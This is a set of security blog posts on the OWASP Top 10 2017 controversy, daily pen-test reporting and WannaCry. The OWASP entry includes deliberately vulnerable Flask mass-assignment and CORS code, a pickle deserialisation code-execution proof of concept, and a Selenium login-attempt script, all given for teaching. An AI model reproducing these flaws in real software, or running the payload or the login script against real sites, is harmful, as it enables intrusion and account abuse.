Author: Josh Grossman

The OWASP Top 10 — An update and a chance to have your say

New developments

You can read my previous blog post about the flap around RC1 of the OWASP Top 10. Since then, there have been a number of important developments.

The first and biggest was the decision that the previous project leaders, Dave Wichers and Jeff Williams, would be replaced by Andrew van der Stock, who himself has extensive experience in AppSec and OWASP. Andrew later brought in Neil Smithline and Torsten Gigler to assist him in leading the project, and Brian Glas (who performed some excellent analysis of RC1) to assist with analysing the newly collected data.

Next, the OWASP Top 10 was extensively discussed at the OWASP summit in May, covering both how it got to where it is today and how it should continue in the future.

Key Outcomes and my Thoughts

The outcomes from the summit can be seen here and here, and the subsequent decisions by the project team are documented here. The most important points (IMHO) that came out of these sessions and the subsequent decisions were as follows:

  • There is a plan in place to require multiple project leaders from multiple organisations for all OWASP flagship projects to try and avoid the independence issues I discussed in my previous post.
  • It is almost certain that the controversial A7 (Insufficient Attack Protection) and A10 (Underprotected APIs) from RC1 will not appear in the next RC or the final version. The reason given is similar to the one I gave in a previous post: these aren’t vulnerabilities (or, more specifically, vulnerability categories). I am really pleased with this decision and I think it will make it much more straightforward to explain and discuss the Top 10 in a coherent way.
  • A7 and A10 were intended to be occupied by “forward looking” items. This will remain the case and this discussion will be opened up to the community by way of a survey where AppSec professionals can provide their feedback on the additional vulnerability categories which they expect to be most important over the next few years. The survey is only open until 30th August 2017 and is available here. I would strongly recommend that anyone with AppSec knowledge/experience takes the time to complete this for the good of the new Top 10 version.
  • Additional time is being provided to supply data to be used in assessing the rest of the Top 10. The window is only open until 18th September 2017 and is available here. I’m not honestly sure what the benefit of gathering additional data on the 8 current vulnerability categories is aside from practice for next time.
  • An updated release timeline has been set with RC2 being targeted for 9th October 2017 to allow for feedback and additional modifications before the final release targeted for 18th November 2017.
  • In general, transparency is to be increased with feedback and preparation processes to be primarily based in the project’s Github repository going forward.
  • The OWASP Top 10 is “art” and not science. It is partially data based but intended to be significantly judgment based as well. We need to be clear about this when we are talking about the project.
  • The OWASP Top 10 is for everyone, but especially for CISOs, rather than for developers. It is intended to capture the highest-risk vulnerability categories. Once again, developers, especially those working on a new project, should be using the OWASP Top 10 Proactive Controls project as their first reference rather than the main OWASP Top 10.

Conclusion

I am very pleased with the way this has turned out so far. I think that the concerns over such an important project have been taken seriously and steps have been taken to protect the integrity of the project and safeguard its future. I think Andrew, Neil, Torsten and Brian are in a great position to carry on the huge efforts which Dave and Jeff put into this project and maintain its position as OWASP’s de facto #1 project.

At the same time, I think that this episode has provided an insight into the efforts and contributions required to progress an OWASP project, shown how an open approach leads to better feedback and contributions and also highlighted other OWASP projects which are complementary to the Top 10. Overall, I think people should see this story as a positive outcome of a collaborative approach and feel encouraged to take part and contribute to this project and other OWASP projects.

Daily Pen Test reports — Pros and Cons

Some of the clients for whom we perform security testing request that we report all findings on a daily basis.

Now, I am 100% behind reporting progress in terms of what has been tested (assuming there are multiple elements) and, more importantly, reporting problems that block progress as soon as possible. However, some clients expect findings to be reported daily on top of this.

I wanted to jot down some thoughts on some pros and cons to this approach.

Advantages

A1: Feeling of progress

The client feels like we are working, progressing and finding stuff. (Although status reporting without findings should also mostly accomplish this).

A2: Immediate feedback and fix

The client receives immediate feedback on findings and can start to look at how to fix them even before we finish testing.

They may even be able to fix the finding and allow us to retest before the end of testing. I am always a little wary of the client making changes to an application in the middle of testing, but if fixing one thing is going to break something else, that will happen regardless of whether the fix is made during the test or after it.

A3: Enforces reporting as you go

There is a tendency for consultants to save all the reporting for the end of the project. Hopefully they took enough screenshots along the way, but even so, suddenly you are at the end of the project and you have 20 findings to write up. Having a daily report ensures that findings are written up as they are found, whilst they are still fresh in the mind.

Disadvantages

D1: Time consuming

Whilst we would have to write up all findings anyway, it is still more time consuming to have to prepare a report daily. The report has to go through a QA process every day instead of just once, and if it is necessary to combine reports from multiple people it can get even more complicated, especially if we are using a complex reporting template.

D2: Difficult to update already reported findings

Sometimes we will find something and only afterwards find another angle or another element to the issue, which means that the finding needs to be updated. This leads to more duplicated effort, with the finding being reviewed multiple times and the client having to read and understand the finding multiple times.

D3: Less time to consider findings in detail

Sometimes it takes time to consider the real impact of a finding. For example, what is the real risk from this finding? Can it only be exploited by an administrator? Will it only be relevant in certain circumstances? Having to rush the finding out in a daily report loses that thinking time and can lead to an inaccurate initial risk rating.

D4: Getting the report ready in time

Every day becomes a deadline day with a race to get the report ready in time. It can disrupt the testing rhythm and mean that consultants have to break from testing to prepare the daily report, losing focus and momentum.

D5: Expectation of linear progress

Testing doesn’t progress in a linear fashion. A consultant might spend one day making slow progress on a particular test and another day find a bunch of quick, lower-risk findings. A daily report creates an expectation of news every day and a feeling that no news means a lack of progress.

D6: Increased likelihood of mistakes

With the added pressure of daily output, the likelihood of mistakes also increases: report preparers are rushing to deliver the daily report by the deadline and reviewers are rushing to release it to the client.

D7: It might not even get to the client!

If there are a few people in the review process and just one of them is delayed in looking at the report or has a query, the report may not make it to the client in time to be relevant before the next day’s report is released anyway!

D8: One size doesn’t fit all

Once you get into the habit of expecting daily reports, or you create that expectation with the client, suddenly it is expected for every project regardless of whether it makes sense. This can mean that ongoing discussion with the client is discouraged because “we’re doing a daily report anyway”, or alternatively a project which requires in-depth thought and research is constantly disturbed by unhelpful daily reports.

Conclusions

I agree that it is a bad idea to do a load of testing and have the client only see output weeks later, especially where there are particularly serious findings that immediately expose the client to serious risk.

However, the need to provide a continual stream of updates wastes time, lowers the quality of findings and disturbs the progression of the test.

As such, whilst the reporting format should be discussed at the start of the project with the client, the aim should be to agree on the following points by communicating the reasons discussed in this post:

  1. If this is a large project where multiple parts are being tested one after the other in a short time-frame, then it is worth reporting on progress over these parts on a daily basis.
  2. Problems with testing should always be reported as soon as possible, with a daily status update on open issues to make sure they are not forgotten.
  3. Critical threats which immediately put the client at severe risk should always be reported as soon as possible.
  4. If the application is currently under development or there is specific pressure to deliver key findings as fast as possible, then high risk findings or medium risk findings can be delivered during the course of the test but should not be restricted to a strictly daily frequency.

Additionally:

  • If this is a short project (up to a week) without lots of different elements, or if this is a long project (several months), then daily status reporting is not appropriate.
  • Reporting of all findings on a strictly daily basis will never be appropriate.

I was recently involved in an application security testing project for a large client covering around 20 applications, with multiple consultants working simultaneously in just three weeks of testing. By discussing with the client up front and agreeing on points 1, 2 and 3 above, we kept the client fully in the loop whilst not burdening ourselves with reporting every tiny detail every day.

I will probably update this post as I think of more advantages/disadvantages but feel free to send me feedback in the comments or via Twitter.

WannaCry — Do you feel lucky?

Was it just ransomware?

During the hysteria around the WannaCry ransomware outbreak, a thought struck me.

A bit later on, I responded to another post where someone had suggested that we were “lucky” that it was only ransomware.

https://twitter.com/JoshCGrossman/status/863991233869484032

As I responded, the only thing that was “lucky” about this story was the fact that the WannaCry outbreak finally brought well-deserved attention to the incredibly dangerous exploits leaked by TheShadowBrokers in April.

How bad is a vulnerability?

I blogged about these exploits on my employer’s blog, precisely because we wanted to make sure that the company’s clients had the relevant information to protect themselves. We don’t blog about every vulnerability or issue that comes to light, but the unique danger posed by this leak meant that we decided it was important to prepare advice. As I said there, this is probably the worst Windows vulnerability since 2008.

Given the overall panic, it seems that despite the leak of *working exploits*, MS17-010 was still not taken seriously enough by Microsoft or by the industry. Microsoft in particular stuck to their guns and didn’t patch XP and 2003 for non-paying customers until it became prudent from a PR perspective.

We in the Information Security industry need to find a better way of communicating the risk posed by a security issue. The frustrating “branded vulnerabilities” trend has led to risk assessment based on logo quality rather than actual potential for damage.

The fact is that, as noted in the 2016 DBIR (page 16), the most dangerous vulnerabilities are those for which real public exploits exist, such as in Metasploit. TheShadowBrokers’ release effectively met that criterion, but despite this the outcry was less than for something like Heartbleed or the damp squib that was Badlock.

Just patch it?

It is clear that there are plenty of organisations where patching is difficult or impossible. Where it is difficult, security professionals need to help these organisations “choose their battles”, and MS17-010 should have been a battle that was fought and won as soon as TheShadowBrokers’ leak of live exploits was shown to be related to it.

However, where patching is impossible (and, to be honest, in all mature organisations), the focus needs to shift to an “anticipate breach” posture, whereby it is almost assumed that attackers will get in through unpatched vulnerabilities or just plain old phishing. In this model, the goal becomes preventing and detecting lateral movement through segmentation and better behavioural logging.

In Conclusion

So, in some ways maybe we got lucky that WannaCry drew so much attention to MS17-010, because it should now be easier to get buy-in to patch some of these specific flaws, just in time for the Metasploit module release (remember the DBIR metric above?).

However, despite this we must ask ourselves now: what other, quieter malware was able to infiltrate company networks whilst this flaw remained unpatched or unconsidered? We have already seen a couple of examples of this.

We need to be better at articulating risk regarding known issues but we also need the detective controls to be ready for the unknown issues as well.

OWASP Top 10 2017 — What should be there?

https://www.flickr.com/photos/samchurchill/4182826573

But first…

Before I start on that, I think it is important to acknowledge the enormous amount of work which Jeff Williams, Dave Wichers and others have put into the OWASP Top 10. Their efforts have made it the best-known OWASP project and certainly the one thing that anyone in technology knows about application security. The current controversy and discussion has only arisen due to the project’s high profile and it is important to give credit to those who made that happen.

My background

I have a decade of IT Risk experience with the last few years mostly focussed on Application Security testing. In this time I have seen, tested and found vulnerabilities in web applications of many different sizes, types and technologies. At the same time I have also had experience explaining these vulnerabilities to client contacts and helping developers with practical mitigations. As such, whilst I cannot provide detailed statistics, I think I can provide a fair assessment of the key issues that web application developers are struggling with today.

More importantly, I work as a security consultant and have no actual or perceived allegiance to any solution or service. My interest is that we have effective tools and materials to help clients better understand application security risk overall.

So what should the Top 10 look like?

I have seen at least one criticism of the OWASP Top 10 which states that most of the categories should no longer be relevant. Unfortunately, recent experience has shown that many companies are still struggling with the basics, and therefore many of the existing categories deserve to remain. Here are my thoughts on the changes.

The Good: Removal of 2013 A10 — Unvalidated Redirects and Forwards

A good change in my opinion. This is clearly still a risk but is probably not serious enough to be in the Top 10. I had a call with a client not long ago where I was trying to mentally run through the Top 10 to guide the conversation and this one didn’t come to mind at all.

The Good cont’d: 2017 A4 — Broken Access Control

This is a great change that makes explaining the list a lot easier. 2013 A4 and 2013 A7 were just too similar for such a short list and it made explaining things difficult.

The Bad(ish): 2017 A10 — Underprotected APIs

I can appreciate that this is a big enough issue that merits its own item even though fundamentally the security risks of APIs will include many of the other items in the Top 10.

Currently the text of 2017 A10 just talks about standard vulnerabilities that can affect all application types. I think that maybe this item should be a little more focussed on issues which are more specific to APIs or “AJAX” style applications which use APIs for populating their web pages.

For example, it should specifically talk about Mass Assignment style vulnerabilities, where the API framework blindly accepts parameters and updates the database without checking them against a whitelist, or the opposite issue where it returns too many data items in a response, e.g. the password field from the database.
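To illustrate what I mean, here is a minimal sketch of a Mass Assignment style flaw and the whitelisting fix. It uses a hypothetical Flask endpoint with an in-memory record; the field names and routes are illustrative only, not taken from any real API.

```python
# A minimal sketch (not from any real codebase) of a Mass Assignment flaw and
# its fix. The Flask endpoint and field names are purely illustrative.
from flask import Flask, request, jsonify

app = Flask(__name__)

# In-memory "database record" standing in for a real user table.
user = {"id": 1, "display_name": "josh", "is_admin": False, "password_hash": "x7..."}

@app.route("/api/v1/profile", methods=["PATCH"])
def update_profile_vulnerable():
    # Vulnerable: every key in the request body is copied onto the record, so a
    # body of {"display_name": "x", "is_admin": true} silently grants admin
    # rights, and the response then leaks everything, including the password hash.
    user.update(request.get_json())
    return jsonify(user)

ALLOWED_INPUT = {"display_name"}         # fields a client may change
EXPOSED_OUTPUT = {"id", "display_name"}  # fields the API may return

@app.route("/api/v2/profile", methods=["PATCH"])
def update_profile_safer():
    # Safer: whitelist both the accepted input and the returned output.
    updates = {k: v for k, v in request.get_json().items() if k in ALLOWED_INPUT}
    user.update(updates)
    return jsonify({k: user[k] for k in EXPOSED_OUTPUT})
```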

It should also highlight the perils of misconfiguring Cross Origin Resource Sharing headers, which can effectively disable the same origin policy, and maybe also the risks of JSONP.
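As a rough illustration of the CORS point, the pattern below (again a hypothetical Flask API, not any specific product) reflects the caller’s Origin header while also allowing credentials, which lets any website a logged-in user visits read authenticated responses:

```python
# A minimal sketch of a dangerous CORS configuration. Endpoint and data are
# illustrative only.
from flask import Flask, request, jsonify

app = Flask(__name__)

@app.after_request
def add_cors_headers(response):
    # Dangerous: trusts whatever Origin the browser sends AND allows cookies
    # to be included, effectively disabling the same origin policy for this API.
    response.headers["Access-Control-Allow-Origin"] = request.headers.get("Origin", "*")
    response.headers["Access-Control-Allow-Credentials"] = "true"
    return response

@app.route("/api/account")
def account_details():
    # Any third-party page visited by an authenticated user can now read this.
    return jsonify({"email": "user@example.com", "account_balance": 1234})
```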

I would rename it to simply “API Vulnerabilities”.

The Ugly: 2017 A7 — Insufficient Attack Protection

Let’s set aside the independence issues that I have previously discussed.

I have spent a long time wrestling with defining IT Risk and IT Security Risk and one of the key principles I have found is that a risk cannot just be the absence of a control.

This new item describes the absence of a control in an application. Other items in the list describe broken controls, but this is the only one which actually talks about the absence of an entirely new set of controls.

I 100% agree that the future of application security is applications which can better protect themselves. Clearly this is a widely-held view, which is why OWASP already has the OWASP Top 10 Proactive Controls, which has the “Implement Logging and Intrusion Detection” control as its #8. This seems like the correct place for explaining what attack protection measures should be implemented.

I therefore think that this item should not appear in the list at all; rather, the “Implement Logging and Intrusion Detection” control should be enhanced with this content, leaving the Top 10 Risks containing only actual risks.

One spot left

So, with one spot on the Top 10 currently untaken, what would I choose?

Ironically, I agree with one of Contrast Security’s suggestions. Deserialisation Vulnerabilities should have their own spot on the Top 10.

I have the following reasons for this:

  • These issues have been around for a long time and have never received enough attention. They only really came to light in 2015 and are still poorly understood.
  • I think one of the reasons for this is that they are hard to understand and hard to casually exploit, especially within the confined time-frame of security testing (see the sketch after this list).
  • They clearly affect a number of heavily used languages.
  • The severity is often critical leading to full Remote Code Execution on the web server, usually from the external Internet.
  • There are plenty of off-the-shelf products which are vulnerable to this. Some of them have been patched to fix it; older ones have not.
  • Fixing the issue is not always straightforward or trivial.
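As a rough sketch of why this class of issue is so severe, the snippet below uses Python’s pickle module; the same underlying problem affects Java, PHP, .NET and Ruby serialisation, although the exploitation details differ in each case.

```python
# Demonstrates why deserialising untrusted data leads to code execution.
# Do not run this against data you did not generate yourself.
import os
import pickle

class Malicious:
    # __reduce__ tells pickle how to rebuild the object; an attacker controls
    # it, so they can make deserialisation call any function with any arguments.
    def __reduce__(self):
        return (os.system, ("id",))

# The "attacker" side: serialise the malicious object into a byte string.
payload = pickle.dumps(Malicious())

# The "application" side: simply loading the attacker-supplied bytes executes
# the command above before any application validation code ever runs.
pickle.loads(payload)
```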

In conclusion

I have already said previously that I think the OWASP Top 10 risks concept needs revamping and I stand by that.

However, in the short term, I think that keeping the focus on actual security risks, especially those which are poorly understood, will add the most value to the OWASP Top 10 2017. The Top 10 is a key tool for helping companies to understand and focus their application security efforts, but this will only remain the case if the list remains internally consistent and relevant.

The OWASP Top 10 — Response to the controversy from Jeff Williams

https://www.owasp.org/

The official response

Following my previous post about the OWASP Top 10 as well as the reaction from many others, Steve Ragan at CSO Online reached out to Contrast Security for their comments on the inclusion of “Insufficient Attack Protection” as the new A7.

Jeff Williams, who is one of the OWASP Top 10 co-authors as well as the CTO of Contrast Security, provided the response. My thoughts are as follows:

Contributions to the Project

The project is open for anyone to participate in. Unfortunately, like most OWASP projects, it is a huge amount of work and very very few contribute.

I think this is a fair and important point. As I previously highlighted, there was a minimal response to the original call for data, with only 11 companies responding with relatively large datasets and 13 additional companies with smaller datasets. As I said in my previous post, and in my conclusion again here, OWASP needs more feedback and more contributors.

The proactive addition of items

The project uses the open data call data to select and prioritize issues, but has also always looked to experts for ideas on what we could include that would drive the appsec community to get in front of problems instead of being reactive. In 2007 it was CSRF, which is still a top ten item supported by tons of data. In 2013 it was use of libraries with known vulnerabilities, again an obvious yet serious and underappreciated problem, and the T10 helped to refocus the industry on it.

Again, I think this is a fair point. Being forward-looking and pro-active is important in such a fast-moving industry.

Certainly in hindsight, “CSRF” and “Libraries with Known Vulnerabilities” were worthy additions to previous releases of the Top 10, but note that they are both “Risks”, i.e. an issue/problem in the application. This is in keeping with the official title of the OWASP Top 10, which is “the OWASP Top 10 Web Application Security Risks”.

In this case, “Insufficient Attack Protection” is not a “Risk”, it is the lack of a “Control”. Note that OWASP already has a less famous but also very valuable Top 10 Proactive Controls list, which has “Implement Logging and Intrusion Detection” as its item #8.

Moreover, despite the assertion above that the project has “looked to experts for ideas”, there is still no evidence of any discussion or consultation about the inclusion of A7 as I discussed in my previous post nor is any further information on this provided in this response.

Lack of a Control ≠ a Risk

Depending on where you observe the problem from, isn’t the lack of a defense a security vulnerability? It just depends on what we expect from our code, our vantage point on security.

Lack of defence is certainly an issue, but in order to decide which controls should be put in place to defend an application, we first have to decide on the risks/vulnerabilities that are most concerning and prioritise accordingly.

The OWASP Top 10 was supposed to highlight the biggest risks to consider and including a control as part of this list confuses this assessment and takes up a space which could be taken by an actual application security risk.

Much of the appsec industry is focused on creating clean code, rather than protecting against attacks. But clearly we need both, as all the focus on hygiene hasn’t worked.

Agreed and again, I imagine this is why “Implement Logging and Intrusion Detection” is on the Top 10 Proactive Controls list.

In conclusion

Disappointingly, the response does not substantively address what I think is one of the key concerns with the latest release which is the lack of an appearance of independence. The response does not provide any further information to fill in the gap between the raw data and the final list nor demonstrate which other experts may have been consulted outside of the project team.

I think the response’s final sentence clearly demonstrates what the next steps should be:

I hope everyone interested in helping with the OWASP T10 will participate in the process, and discuss the pros and cons of this latest release candidate.

I set out my opinions for the future of the Top 10 risks project in my previous post but it is clear that there will still be a 2017 release.

The official instructions on the OWASP Top 10 site state:

Constructive comments on this OWASP Top 10–2017 Release Candidate should be forwarded via email to OWASP-TopTen@lists.owasp.org. Private comments may be sent to dave.wichers@owasp.org. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the items listed in the Top 10 should include a complete suggested list of 10 items, along with a rationale for any changes. All comments should indicate the specific relevant page and section.

I would therefore urge anyone in the application security industry to provide public comments by June 30, 2017 as has been requested by the project team. If enough constructive comments are submitted in the requested format, we will be in a good position at the final release of the list to assess to what extent the project team has taken the industry’s feedback into consideration.

Behind the OWASP Top 10 2017 RC1

The power of OWASP

OWASP (The Open Web Application Security Project) was started in 2001 and describes itself as a:

“…worldwide not-for-profit charitable organization focused on improving the security of software”

The project has been enormously successful in reputation terms and is now considered the primary source of knowledge and truth when it comes to web application security.

In my job as an IT Security Consultant, I see many examples of companies relying on OWASP and the OWASP Top 10 Web Application Security Risks (hereafter “the OWASP Top 10”) and even considering the OWASP Top 10 as a de facto standard.

I have seen the following real life examples of this (without discussing whether each company is making correct use of the terminology):

  • Companies engaging with a software supplier will require them to have a secure development life-cycle which complies with OWASP guidelines.
  • Companies want us to provide (potentially based on their own client requirements) secure development training which covers the OWASP Top 10.
  • Companies expect that when we provide them with Application Security testing services, we follow a recognised methodology such as that set out by OWASP.
  • Companies require us to provide an Application Security testing report which maps our findings to the OWASP Top 10. (We don’t like doing this as clearly the OWASP Top 10 cannot cover all types of findings)
  • Companies want us to provide just a “quick test” which “just covers the OWASP Top 10”. (We don’t do this!)
  • Companies want us to provide them with a “certification” that their application “complies” with the OWASP Top 10. (Good lord, no!)

The OWASP reality

The fact is that there are a large number of very high quality products and resources from OWASP (my personal favourites being OWASP ZAP, the OWASP Testing Guide and OWASP Juice Shop).

However, the quality of OWASP resources will generally be based on how much effort its unpaid volunteers are able or willing to put in and how much assistance they receive. For example, the OWASP ESAPI (Enterprise Security API) project was at one time a flagship project but was “demoted”, an action which its Java project owner agreed with. Its wiki page now recommends considering other alternatives before considering ESAPI.

To paraphrase the blog post above, not enough people were willing/able to spend time developing/maintaining it.

I don’t think that the ESAPI example should detract from the overall benefits which OWASP brings to the community, but I do think that people do not necessarily appreciate the relatively narrow base on which OWASP rests and its reliance on certain key people.

The OWASP Top 10 itself is considered a Flagship project and justifiably so given its success over the last 15 years. However…

Appearance of independence

Early in my professional life, I worked at a Big 4 accountancy firm where the idea of “independence” was drummed into me. In the Big 4 context, this is relevant for “Auditor Independence” where a Financial Auditor firm and its staff must demonstrate that they are able to perform a completely unbiased review of a company’s financial reporting without being exposed to external pressures which prevent it from being impartial such as a financial interest or inducement.

We were told that a Financial Auditor must both “be independent” and “be seen to be independent”. This second definition effectively means that even something that just looks like it would threaten independence, even if it does not, should be considered as a risk and avoided as carefully as an actual independence risk.

http://kfknowledgebank.kaplan.co.uk/KFKB/Wiki%20Pages/Audit%20and%20compliance.aspx

The OWASP Top 10 RC1 — Appearing independent

A Release Candidate of the OWASP Top 10 2017 was released a few weeks ago. Many people with more experience than I have debated both the technical merits of the latest release candidate and also examined the underlying data on which it was based.

However, I want to highlight a key point. The new items in the list are A7 — Insufficient Attack Protection and A10 — Underprotected APIs. Specifically about A7, the 2017 introduction says:

https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf (Page 5)

I don’t want to get into the merits of this new item but the analysis which I noted above highlights that there were three companies who suggested an idea similar to the new A7 risk, “Network Test Labs Inc.”, “Shape Security” and “Contrast Security”.

From: https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true

Shape Security are a vendor who make anti-automation software.

The vulnerability data which they have provided for the OWASP Top 10 relates to anti-automation and nothing else. They have recommended one additional item for the OWASP Top 10 and that is the problem which they can solve (h/t to Andrew Kalat at the Defensive Security Podcast).

Similarly, Network Test Labs also only provided vulnerability data in the anti-automation category and no other. They have performed some very limited research to support this:

We chose 3 US companies that had many users (as evidenced by their Alexa ratings) and were sizeable ($1B+ revenue) along with 2 other large US companies. We used a simple Selenium test to login to a website with 5 sets of credentials, 4 fake and 1 real. On 3 of the websites we tested, all 5 login attempts were possible, including the real set of credentials.
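For illustration, a test along those lines might look something like the rough Python/Selenium sketch below; the URL, selectors and credentials are hypothetical placeholders, and the actual test they ran may well have differed.

```python
# A rough sketch of a credential-stuffing style check: submit several login
# attempts in quick succession and see whether any of them are blocked.
from selenium import webdriver
from selenium.webdriver.common.by import By

CREDENTIALS = [
    ("real.user@example.com", "the-real-password"),  # 1 real
    ("fake1@example.com", "password1"),              # 4 fake
    ("fake2@example.com", "password2"),
    ("fake3@example.com", "password3"),
    ("fake4@example.com", "password4"),
]

driver = webdriver.Chrome()
for username, password in CREDENTIALS:
    driver.get("https://target.example.com/login")
    driver.find_element(By.NAME, "username").send_keys(username)
    driver.find_element(By.NAME, "password").send_keys(password)
    driver.find_element(By.CSS_SELECTOR, "button[type=submit]").click()
    # If none of these scripted attempts are throttled, challenged with a
    # CAPTCHA or locked out, the site is doing little to resist automation.
    print(username, "->", driver.current_url)
driver.quit()
```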

Finally, one of Contrast Security’s key products is a RASP (Runtime Application Self Protection) solution:

The new OWASP Top 10 2017 RC draft specifically name-drops “RASP” as a possible way of addressing the new A7 Insufficient Attack Protection risk.

https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf (Page 14)

Additionally, Contrast Security’s CTO and co-founder is Jeff Williams, who is also the OWASP Top 10 project creator and co-author. It is important to note, however, that Jeff does have an impressive history in OWASP and AppSec in general.

Contrast Security was also the only contributor to suggest the other new risk which was added “A10 — Underprotected APIs”.

Having the only two new risks come from one company with such a close tie to the OWASP Top 10 does not have the appearance of independence. There is no attempt to disclose or highlight this connection in the OWASP Top 10 material, and the company itself is already using the new Top 10 (which is technically still only a release candidate) in its marketing.

https://www.contrastsecurity.com/security-influencers/owasp-top-10-for-2017

Final Thoughts

The OWASP Top 10 project clearly provides its raw data sources but as the nVisium blog referenced above notes, the process between the raw data and the final Top 10 is not clear.

Additionally the Top 10 document states:

https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf (Page 3)

In my opinion, the process by which the new OWASP Top 10 release candidate has been produced does not have the appearance of independence and it is not currently clear whether it can demonstrate actual independence due to the missing link between the data and the end result.

On the other hand, as I noted above, OWASP is entirely dependent on volunteers who are prepared to put time and effort into its projects and therefore it can only work with what it has.

I think the response to this has to be three-fold.

  1. In the short term, I think the OWASP Top 10 project has to more clearly articulate its limitations. I would like to think that if the issues I have set out above were communicated correctly to companies and policy writers, they would understand the limitations and we would see less use of the OWASP Top 10 as a de facto standard. Companies should be using the more comprehensive Testing Guide and the ASVS (Application Security Verification Standard) as a starting point, potentially cherry picking the areas which will be most relevant to them.
  2. Perhaps the OWASP Top 10 Web Application Security Risks needs to be a data/risk-driven view of the key issues being seen in the wild, with more frequent updates but less focus on preparing a detailed and complex document. The focus should be on an ordered list of specific issues rather than trying to compress lots of issues into a top 10 list. The OWASP Top 10 Proactive Controls, which is a really useful and practical document for developers, should be based on this list of top issues (but not one-to-one) and provide actual hands-on ways to address the most common security issues from the original list.
  3. Finally, the industry needs to be more involved in contributing to efforts like these. Only 11 companies contributed the vast majority of the data for the OWASP Top 10. I will certainly be encouraging my employer to start collecting the data required to submit and I think it is important that others do as well.

OWASP and its volunteers have worked hard to build this brand and reputation and it is our responsibility to help maintain and develop this.

Update: In a subsequent post, James Kettle pointed out that a similar issue involving Contrast Security has occurred in the past.